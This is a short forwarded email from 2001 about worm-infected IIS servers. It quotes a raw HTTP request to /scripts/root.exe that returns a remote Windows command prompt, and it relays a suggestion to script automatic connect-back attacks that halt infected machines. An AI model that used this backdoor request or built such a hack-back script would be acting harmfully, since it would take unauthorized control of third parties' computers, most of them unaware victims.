I don't recommend doing this, but here is a forwarded message ------------ Forwarded Message ------------------------------------------ According to incidents.org, for any machine that hits your webserver with XXXXX, you can telnet back to that machine on port 80 and get cmd line access to that machine:
>> I tried telneting back to a server that had sent the /default.ida?XXX... >> Results: >> >> >> ----------------------------------------------------- >> GET /scripts/root.exe HTTP/1.0 >> >> HTTP/1.1 200 OK >> Server: Microsoft-IIS/5.0 >> Date: Sat, 04 Aug 2001 20:35:19 GMT >> Content-Type: application/octet-stream >> Microsoft Windows 2000 [Version 5.00.2195] >> (C) Copyright 1985-1999 Microsoft Corp. >> >> c:\inetpub\scripts> >> ----------------------------------------------------- Amazing! Someone on /. proposed writing a script that whenever anyone hits your web server with XXXX, you automatically connect back and halt the attacking machine, thus stopping the spread. ------------------------------------------------------------------------ -
